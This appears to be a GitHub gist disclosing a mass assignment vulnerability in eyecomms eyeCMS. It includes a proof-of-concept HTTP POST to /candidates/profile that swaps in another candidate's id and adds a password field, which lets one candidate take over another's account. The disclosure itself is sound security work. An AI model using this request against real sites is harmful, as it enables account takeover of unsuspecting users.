Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
[Suggested description]
A mass assignment vulnerability in eyecomms eyeCMS through 2019-10-15 allows any
candidate to take over another candidate's account (by also exploiting CVE-2019-17604) via
a modified candidate id and an additional password parameter,
The outcome is that the password of this other candidate is changed.
[Vendor of Product]
eyecomms
[Affected Product Code Base]
eyeCMS - unknown version (commercial)
[Affected Component]
careers page
[CVE Impact Other]
Takeover other users' account
[Attack Vectors]
to exploit the vulnerability, attacker should register as a candidate.
[PoC]
POST /candidates/profile HTTP/1.1
Host: www.XXX.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNpWnwAzZI1eCzzi6
Cookie: XSRF-TOKEN=RBKoyftI3JftAA1TvxuSWI3JftAA1TvxuSWyKOSDwzkiYE9wSt; laravel_session=S1evI3JftAA1TvxuSWyKOSDwzkiYoIGBX4YUfjC7dDHKV;
------WebKitFormBoundaryNpWnwAzZI1eCzzi6
Content-Disposition: form-data; name="_token"
RBKoyftI3JftAA1TvxuSWI3JftAA1TvxuSWyKOSDwzkiYE9wSt
------WebKitFormBoundaryNpWnwAzZI1eCzzi6
Content-Disposition: form-data; name="id"
4456 <-- change this to any other user id
------WebKitFormBoundaryNpWnwAzZI1eCzzi6
Content-Disposition: form-data; name="password" <-- Add this parameter
p@assword
------WebKitFormBoundaryNpWnwAzZI1eCzzi6
Content-Disposition: form-data; name="first_name"
testt
------WebKitFormBoundaryNpWnwAzZI1eCzzi6--
...etc
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.